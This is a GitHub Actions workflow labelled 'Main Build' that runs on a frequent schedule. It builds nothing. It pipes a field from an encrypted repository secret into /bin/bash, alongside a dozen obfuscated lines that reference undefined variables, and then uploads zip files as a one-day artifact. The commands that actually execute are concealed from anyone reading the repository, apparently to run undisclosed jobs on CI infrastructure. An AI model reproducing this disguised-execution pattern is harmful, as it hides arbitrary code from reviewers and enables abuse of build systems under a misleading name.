name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '8 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          rqbhn7: ${{ secrets.rqbhn7 }}
        run: |
          printf '%s' "$rqbhn7" | jq -r .s91 | /bin/bash
          echo $y85 | jq -r .rkznn5 | /bin/bash
          echo $ff35523 | jq -r .aga5343 | /bin/bash
          printf '%s' "$bdzpy7356" | jq -r .dtanb12 | /bin/bash
          printf '%s' "$r354" | jq -r .nxa7 | /bin/bash
          echo $wosqj03702 | jq -r .ia3 | /bin/bash
          echo $vgio1 | jq -r .cxw16 | /bin/bash
          printf '%s' "$hq5574" | jq -r .l678 | /bin/bash
          echo $svkt57 | jq -r .lpx1 | /bin/bash
          echo $z8880 | jq -r .vzzqn0187 | /bin/bash
          printf '%s' "$xlu0" | jq -r .oe6103 | /bin/bash
          printf '%s' "$py08855" | jq -r .ros59174 | /bin/bash
          echo $ug66345 | jq -r .l5 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ueupMDf2
          path: "*.zip"
          retention-days: 1
